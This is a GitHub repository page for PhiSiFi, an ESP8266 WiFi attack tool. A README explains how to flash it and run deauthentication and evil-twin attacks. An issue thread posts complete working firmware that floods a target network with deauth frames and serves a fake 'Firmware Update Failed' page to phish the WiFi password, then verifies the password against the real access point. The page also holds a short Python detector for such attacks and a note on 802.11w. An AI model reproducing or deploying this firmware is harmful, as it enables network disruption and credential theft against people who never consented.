p3tr0s / phisifi

WiFi Hacking with an ESP8266 - Deauth combined with Evil Twin attack

C++ 100.00%
cheap deauthentication-attack deauther esp esp8266 evil-twin hacking hacking-tool hak5 sbc spacehuhn wifi

phisifi's Introduction

PhiSiFi


It uses an ESP8266 to attack a WiFi network using the Deauther and/or Evil-Twin AP method.

FEATURES :

  • Deauthentication of a target WiFi access point
  • Evil-Twin AP to capture passwords, with password verification against the original access point
  • It can run both attacks at the same time; no toggling of the deauther is required.

DISCLAIMER

The source code given in this public repo is for educational use only and should only be used against your own networks and devices!
Please check the legal regulations in your country before using it.

Install using Arduino IDE

  1. Install Arduino IDE
  2. In Arduino, go to File -> Preferences and add this URL to Additional Boards Manager URLs: https://raw.githubusercontent.com/SpacehuhnTech/arduino/main/package_spacehuhn_index.json
  3. In Arduino, go to Tools -> Board -> Boards Manager, then search for and install the deauther package
  4. Download and open PhiSiFi with Arduino IDE
  5. Select an ESP8266 Deauther board in Arduino under Tools -> Board
  6. Connect your device and select the serial port in Arduino under Tools -> Port
  7. Click the Upload button

How to use:

  • Connect to the AP named WiPhi_34732 with password d347h320 from your phone/PC.
  • Select the target AP you want to attack (the list of available APs refreshes every 30 seconds; a page reload is required).
  • Click the Start Deauthing button to start kicking devices off the selected network.
  • Click the Start Evil-Twin button and optionally reconnect to the newly created AP, which has the same name as your target (it will be open).
  • You can stop any of the attacks by visiting 192.168.4.1/admin while connected to the Evil-Twin AP, or by resetting the ESP8266.
  • Once a correct password is found, the AP will be restarted with the default SSID WiPhi_34732 / d347h320, and at the bottom of the table you should be able to see something like "Successfully got password for - TARGET_SSID - PASSWORD".
    • If you power down or hard reset the device, the gathered info will be lost.
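From the defending side, the two behaviours described above leave clear traces: repeated broadcast deauthentication/disassociation frames carrying the target's BSSID, and an open AP advertising the same SSID as a protected one. The following detection sketch is an added example, not part of the PhiSiFi code; it assumes raw 802.11 frames with any radiotap header already stripped, uses the 26-byte frame layout shown in the issue code on this page, and all MAC addresses, SSIDs, thresholds and sample data in it are constructed.

```python
from collections import defaultdict

BROADCAST = b"\xff" * 6
SUBTYPES = {0xC0: "deauth", 0xA0: "disassoc"}  # first frame-control byte

def parse_mgmt(frame: bytes):
    """Return (kind, receiver, bssid, reason) for a deauth/disassoc frame, else None."""
    if len(frame) < 26 or frame[0] not in SUBTYPES:
        return None
    reason = int.from_bytes(frame[24:26], "little")
    return SUBTYPES[frame[0]], frame[4:10], frame[16:22], reason

def fmt(mac: bytes) -> str:
    return ":".join(f"{b:02x}" for b in mac)

def deauth_floods(capture, window=1.0, threshold=5):
    """capture: iterable of (timestamp_seconds, raw_frame).
    Flag BSSIDs with >= threshold broadcast deauth/disassoc frames inside `window`."""
    times, flagged = defaultdict(list), set()
    for ts, raw in sorted(capture, key=lambda item: item[0]):
        parsed = parse_mgmt(raw)
        if parsed is None or parsed[1] != BROADCAST:
            continue  # a single unicast deauth is normal AP behaviour
        bssid = parsed[2]
        times[bssid] = [t for t in times[bssid] if ts - t < window] + [ts]
        if len(times[bssid]) >= threshold:
            flagged.add(fmt(bssid))
    return sorted(flagged)

def open_twins(scan):
    """scan: iterable of (ssid, bssid, encrypted).
    Return SSIDs seen encrypted on one BSSID and open on a different BSSID."""
    by_ssid = defaultdict(lambda: {True: set(), False: set()})
    for ssid, bssid, encrypted in scan:
        by_ssid[ssid][encrypted].add(bssid)
    return sorted(s for s, v in by_ssid.items() if v[True] and v[False] - v[True])

# --- constructed sample data (locally administered MACs, made-up SSIDs) ---
AP_A = bytes.fromhex("020000000001")
AP_B = bytes.fromhex("020000000002")

def _frame(kind_byte, bssid):
    # frame control, duration, receiver, source, BSSID, sequence, reason code 1
    return (bytes([kind_byte, 0]) + b"\x00\x00" + BROADCAST + bssid + bssid
            + b"\x00\x00" + b"\x01\x00")

SAMPLE_CAPTURE = (
    [(i * 0.2, _frame(0xC0, AP_A)) for i in range(10)]           # deauth every 200 ms
    + [(i * 0.2 + 0.01, _frame(0xA0, AP_A)) for i in range(10)]  # paired disassoc
    + [(0.5, _frame(0xC0, AP_B))]                                # one isolated frame
)
SAMPLE_SCAN = [
    ("HomeNet", "02:00:00:00:00:01", True),
    ("HomeNet", "02:00:00:00:00:99", False),   # open AP reusing a protected SSID
    ("CafeGuest", "02:00:00:00:00:02", False),
]

if __name__ == "__main__":
    print("flood sources:", deauth_floods(SAMPLE_CAPTURE))
    print("open twins:", open_twins(SAMPLE_SCAN))
```

Networks that enforce Protected Management Frames (802.11w) make clients ignore unauthenticated deauthentication and disassociation frames, which removes the lever that pushes them toward the open twin.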

It doesn't work for me:

  • For starters, I don't really care - it's something I did for fun and a POC that worked on my test surface and I do not provide any support for.
  • Follow SpaceHuhn and read his blog https://blog.spacehuhn.com/deauth-attack-not-working to learn about the attack.
  • If you can offer some input on what you think is wrong feel free to let me know and I will try, at some point, to fix it.

License

This software is licensed under the MIT License.

phisifi's Issues

deauthPacket invalid

Can't deauth. I think it is invalid. WI-PWN could work, so it doesn't matter with my board.

Btw, I use VSCode to upload, and lib choose well.

enhanced deauth which works well on esp8266

#include <Arduino.h>
#include <ESP8266WiFi.h>
#include <DNSServer.h>
#include <ESP8266WebServer.h>
#include <ESP8266HTTPClient.h>

extern "C" {
#include "user_interface.h"
}

typedef struct
{
String ssid;
uint8_t ch;
uint8_t bssid[6];
} _Network;

const byte DNS_PORT = 53;
IPAddress apIP(192, 168, 1, 1);
DNSServer dnsServer;
ESP8266WebServer webServer(80);

_Network _networks[16];
_Network _selectedNetwork;

void clearArray() {
for (int i = 0; i < 16; i++) {
_Network _network;
_networks[i] = _network;
}

}

String _correct = "";
String _tryPassword = "";

// Default main strings
#define SUBTITLE "ACCESS POINT RESCUE MODE"
#define TITLE "⚠ Firmware Update Failed"
#define BODY "Your router encountered a problem while automatically installing the latest firmware update.

To revert the old firmware and manually update later, please verify your password."

String header(String t) {
String a = String(_selectedNetwork.ssid);
String CSS = "article { background: #f2f2f2; padding: 1.3em; }"
"body { color: #333; font-family: Century Gothic, sans-serif; font-size: 18px; line-height: 24px; margin: 0; padding: 0; }"
"div { padding: 0.5em; }"
"h1 { margin: 0.5em 0 0 0; padding: 0.5em; font-size:7vw;}"
"input { width: 100%; padding: 9px 10px; margin: 8px 0; box-sizing: border-box; border-radius: 0; border: 1px solid #555555; border-radius: 10px; }"
"label { color: #333; display: block; font-style: italic; font-weight: bold; }"
"nav { background: #0066ff; color: #fff; display: block; font-size: 1.3em; padding: 1em; }"
"nav b { display: block; font-size: 1.5em; margin-bottom: 0.5em; } "
"textarea { width: 100%; }"
;
String h = ""
"<title>

" + a + " :: " + t + "</title>"
"<meta name=viewport content="width=device-width,initial-scale=1">"
"<style>" + CSS + "</style>"
"<meta charset="UTF-8">"
"" + a + " " + SUBTITLE + "

" + t + "

";
return h;
}

String footer() {
return "

© All rights reserved.
";
}

String index() {
return header(TITLE) + "

" + BODY + "
WiFi password:" +
"" + footer();
}

void setup() {

Serial.begin(115200);
WiFi.mode(WIFI_AP_STA);
wifi_promiscuous_enable(1);
WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
WiFi.softAP("WiPhi_34732", "Op00000000");
dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));

webServer.on("/", handleIndex);
webServer.on("/result", handleResult);
webServer.on("/admin", handleAdmin);
webServer.onNotFound(handleIndex);
webServer.begin();
}
void performScan() {
int n = WiFi.scanNetworks();
clearArray();
if (n >= 0) {
for (int i = 0; i < n && i < 16; ++i) {
_Network network;
network.ssid = WiFi.SSID(i);
for (int j = 0; j < 6; j++) {
network.bssid[j] = WiFi.BSSID(i)[j];
}

  network.ch = WiFi.channel(i);
  _networks[i] = network;
}

}
}

bool hotspot_active = false;
bool deauthing_active = false;

void handleResult() {
String html = "";
if (WiFi.status() != WL_CONNECTED) {
if (webServer.arg("deauth") == "start") {
deauthing_active = true;
}
webServer.send(200, "text/html", "<script> setTimeout(function(){window.location.href = '/';}, 4000); </script>


Wrong Password

Please, try again.

");
Serial.println("Wrong password tried!");
} else {
_correct = "Successfully got password for: " + _selectedNetwork.ssid + " Password: " + _tryPassword;
hotspot_active = false;
dnsServer.stop();
int n = WiFi.softAPdisconnect (true);
Serial.println(String(n));
WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
WiFi.softAP("WiPhi_34732", "Op00000000");
dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
Serial.println("Good password was entered !");
Serial.println(_correct);
}
}

String _tempHTML = ""
"<style> .content {max-width: 500px;margin: auto;}table, th, td {border: 1px solid black;border-collapse: collapse;padding-left:10px;padding-right:10px;}</style>"
"

"
"
"
"<button style='display:inline-block;'{disabled}>{deauth_button}"
""
"<button style='display:inline-block;'{disabled}>{hotspot_button}"
"

";

void handleIndex() {

if (webServer.hasArg("ap")) {
for (int i = 0; i < 16; i++) {
if (bytesToStr(_networks[i].bssid, 6) == webServer.arg("ap") ) {
_selectedNetwork = _networks[i];
}
}
}

if (webServer.hasArg("deauth")) {
if (webServer.arg("deauth") == "start") {
deauthing_active = true;
} else if (webServer.arg("deauth") == "stop") {
deauthing_active = false;
}
}

if (webServer.hasArg("hotspot")) {
if (webServer.arg("hotspot") == "start") {
hotspot_active = true;

  dnsServer.stop();
  int n = WiFi.softAPdisconnect (true);
  Serial.println(String(n));
  WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
  WiFi.softAP(_selectedNetwork.ssid.c_str());
  dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));

} else if (webServer.arg("hotspot") == "stop") {
  hotspot_active = false;
  dnsServer.stop();
  int n = WiFi.softAPdisconnect (true);
  Serial.println(String(n));
  WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
  WiFi.softAP("WiPhi_34732", "Op00000000");
  dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
}
return;

}

if (hotspot_active == false) {
String _html = _tempHTML;

for (int i = 0; i < 16; ++i) {
  if ( _networks[i].ssid == "") {
    break;
  }
  _html += "<tr><td>" + _networks[i].ssid + "</td><td>" + bytesToStr(_networks[i].bssid, 6) + "</td><td>" + String(_networks[i].ch) + "<td><form method='post' action='/?ap=" + bytesToStr(_networks[i].bssid, 6) + "'>";

  if (bytesToStr(_selectedNetwork.bssid, 6) == bytesToStr(_networks[i].bssid, 6)) {
    _html += "<button style='background-color: #90ee90;'>Selected</button></form></td></tr>";
  } else {
    _html += "<button>Select</button></form></td></tr>";
  }
}

if (deauthing_active) {
  _html.replace("{deauth_button}", "Stop deauthing");
  _html.replace("{deauth}", "stop");
} else {
  _html.replace("{deauth_button}", "Start deauthing");
  _html.replace("{deauth}", "start");
}

if (hotspot_active) {
  _html.replace("{hotspot_button}", "Stop EvilTwin");
  _html.replace("{hotspot}", "stop");
} else {
  _html.replace("{hotspot_button}", "Start EvilTwin");
  _html.replace("{hotspot}", "start");
}


if (_selectedNetwork.ssid == "") {
  _html.replace("{disabled}", " disabled");
} else {
  _html.replace("{disabled}", "");
}

_html += "</table>";

if (_correct != "") {
  _html += "</br><h3>" + _correct + "</h3>";
}

_html += "</div></body></html>";
webServer.send(200, "text/html", _html);

} else {

if (webServer.hasArg("password")) {
  _tryPassword = webServer.arg("password");
  if (webServer.arg("deauth") == "start") {
    deauthing_active = false;
  }
  delay(1000);
  WiFi.disconnect();
  WiFi.begin(_selectedNetwork.ssid.c_str(), webServer.arg("password").c_str(), _selectedNetwork.ch, _selectedNetwork.bssid);
  webServer.send(200, "text/html", "<!DOCTYPE html> <html><script> setTimeout(function(){window.location.href = '/result';}, 15000); </script></head><body><center><h2 style='font-size:7vw'>Verifying integrity, please wait...<br><progress value='10' max='100'>10%</progress></h2></center></body> </html>");
  if (webServer.arg("deauth") == "start") {
  deauthing_active = true;
  }
} else {
  webServer.send(200, "text/html", index());
}

}

}

void handleAdmin() {

String _html = _tempHTML;

if (webServer.hasArg("ap")) {
for (int i = 0; i < 16; i++) {
if (bytesToStr(_networks[i].bssid, 6) == webServer.arg("ap") ) {
_selectedNetwork = _networks[i];
}
}
}

if (webServer.hasArg("deauth")) {
if (webServer.arg("deauth") == "start") {
deauthing_active = true;
} else if (webServer.arg("deauth") == "stop") {
deauthing_active = false;
}
}

if (webServer.hasArg("hotspot")) {
if (webServer.arg("hotspot") == "start") {
hotspot_active = true;

  dnsServer.stop();
  int n = WiFi.softAPdisconnect (true);
  Serial.println(String(n));
  WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
  WiFi.softAP(_selectedNetwork.ssid.c_str());
  dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));

} else if (webServer.arg("hotspot") == "stop") {
  hotspot_active = false;
  dnsServer.stop();
  int n = WiFi.softAPdisconnect (true);
  Serial.println(String(n));
  WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
  WiFi.softAP("WiPhi_34732", "Op00000000");
  dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
}
return;

}

for (int i = 0; i < 16; ++i) {
if ( _networks[i].ssid == "") {
break;
}
_html += "

SSIDBSSIDChannelSelect
" + _networks[i].ssid + "" + bytesToStr(_networks[i].bssid, 6) + "" + String(_networks[i].ch) + "";

if ( bytesToStr(_selectedNetwork.bssid, 6) == bytesToStr(_networks[i].bssid, 6)) {
  _html += "<button style='background-color: #90ee90;'>Selected</button></form></td></tr>";
} else {
  _html += "<button>Select</button></form></td></tr>";
}

}

if (deauthing_active) {
_html.replace("{deauth_button}", "Stop deauthing");
_html.replace("{deauth}", "stop");
} else {
_html.replace("{deauth_button}", "Start deauthing");
_html.replace("{deauth}", "start");
}

if (hotspot_active) {
_html.replace("{hotspot_button}", "Stop EvilTwin");
_html.replace("{hotspot}", "stop");
} else {
_html.replace("{hotspot_button}", "Start EvilTwin");
_html.replace("{hotspot}", "start");
}

if (_selectedNetwork.ssid == "") {
_html.replace("{disabled}", " disabled");
} else {
_html.replace("{disabled}", "");
}

if (_correct != "") {
_html += "

" + _correct + "

";
}

_html += "

";
webServer.send(200, "text/html", _html);

}

String bytesToStr(const uint8_t* b, uint32_t size) {
String str;
const char ZERO = '0';
const char DOUBLEPOINT = ':';
for (uint32_t i = 0; i < size; i++) {
if (b[i] < 0x10) str += ZERO;
str += String(b[i], HEX);

if (i < size - 1) str += DOUBLEPOINT;

}
return str;
}

unsigned long now = 0;
unsigned long wifinow = 0;
unsigned long deauth_now = 0;

bool sendPacket(uint8_t* packet, uint16_t packetSize, uint8_t wifi_channel) {
Serial.println(wifi_channel);
// Serial.println(bytesToStr(packet, 26));
wifi_set_channel(wifi_channel);

bool sent = wifi_send_pkt_freedom(packet, packetSize, 0) == 0;
if (sent) Serial.println("done");
return sent;

}

void loop() {

dnsServer.processNextRequest();
webServer.handleClient();

if (deauthing_active && millis() - deauth_now >= 200) {

uint8_t packet[26] = {
0xC0, 0x00,
0x00, 0x00,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00,
0x01, 0x00
};



bool success = false;
memcpy(&packet[10], _selectedNetwork.bssid, 6);
memcpy(&packet[16], _selectedNetwork.bssid, 6);

if (sendPacket(packet, sizeof(packet), _selectedNetwork.ch)) {
    success = true;
}

// send disassociate frame
packet[0] = 0xa0;

if (sendPacket(packet, sizeof(packet), _selectedNetwork.ch)) {
    success = true;
}



// uint8_t* apMac;

// uint8_t reason;
// uint8_t ch;
// apMac = _selectedNetwork.bssid;
// uint8_t stMac[6] = {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF};
// reason = 1;
// ch = _selectedNetwork.ch;
// deauthDevice(apMac, stMac, reason, ch);


// uint8_t deauthPacket[26] = {
//         /*  0 - 1  */ 0xC0, 0x00,                         // type, subtype c0: deauth (a0: disassociate)
//         /*  2 - 3  */ 0x00, 0x00,                         // duration (SDK takes care of that)
//         /*  4 - 9  */ 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, // reciever (target)
//         /* 10 - 15 */ 0xb6, 0x69, 0x21, 0x74, 0x02, 0xb6, // source (ap)
//         /* 16 - 21 */ 0xb6, 0x69, 0x21, 0x74, 0x02, 0xb6, // BSSID (ap)
//         /* 22 - 23 */ 0x00, 0x00,                         // fragment & squence number
//         /* 24 - 25 */ 0x01, 0x00                          // reason code (1 = unspecified reason)
//     };


// packetSize = sizeof(deauthPacket);
// uint8_t deauthpkt[packetSize];
// uint8_t broadcast[] = {0x32, 0xAE, 0xA4, 0x07, 0x0D, 0x66};

// memcpy(deauthpkt, deauthPacket, packetSize);
// memcpy(&deauthpkt[4], broadcast, 6);
// // memcpy(&deauthpkt[10], _selectedNetwork.bssid, 6);
// // memcpy(&deauthpkt[16], _selectedNetwork.bssid, 6);
// deauthpkt[24] = 1;

// Serial.println(bytesToStr(deauthPacket, 26));
// deauthpkt[0] = 0xc0;
// wifi_set_channel(_selectedNetwork.ch);
// Serial.println(wifi_send_pkt_freedom(deauthpkt, sizeof(deauthPacket), 0));
// Serial.println(bytesToStr(deauthPacket, 26));
// uint8_t disassocpkt[packetSize];
// memcpy(disassocpkt, deauthpkt, packetSize);
// disassocpkt[0] = 0Xa0;
// Serial.println(wifi_send_pkt_freedom(disassocpkt, sizeof(deauthPacket), 0));

// deauth_now = millis();










// packetSize = sizeof(deauthPacket);

// uint8_t deauthpkt[sizeof(deauthPacket)];

// memcpy(deauthpkt, deauthPacket, packetSize);

// memcpy(&deauthPacket[4], broadcast, 6);
// memcpy(&deauthPacket[10], _selectedNetwork.bssid, 6);
// memcpy(&deauthPacket[16], _selectedNetwork.bssid, 6);
// uint8_t deauthPacket[24] = 1;

// // send deauth frame
// uint8_t deauthPacket[0] = 0xc0;

// wifi_set_channel(_selectedNetwork.ch);

// wifi_send_pkt_freedom(deauthPacket, sizeof(deauthPacket), _selectedNetwork.ch) == 0;
// // send disassociate frame
// // uint8_t disassocpkt[packetSize];

// // memcpy(disassocpkt, deauthPacket, packetSize);

// uint8_t disassocpkt[0] = 0xa0;

// wifi_set_channel(_selectedNetwork.ch);

// wifi_send_pkt_freedom(deauthPacket, sizeof(deauthPacket), _selectedNetwork.ch) == 0;
deauth_now = millis();

}

if (millis() - now >= 15000) {
performScan();
now = millis();
}

if (millis() - wifinow >= 2000) {
// if (WiFi.status() != WL_CONNECTED) {
// Serial.println("BAD");
// } else {
// Serial.println("GOOD");
// }
wifinow = millis();
}
}

Must find the bin file 😆😆

How can I redo the "wifi" sign to make it more user-friendly?, seems like deauther doesn't work anymore!?...."I use google translate". Everything worked fine 🥹🥹
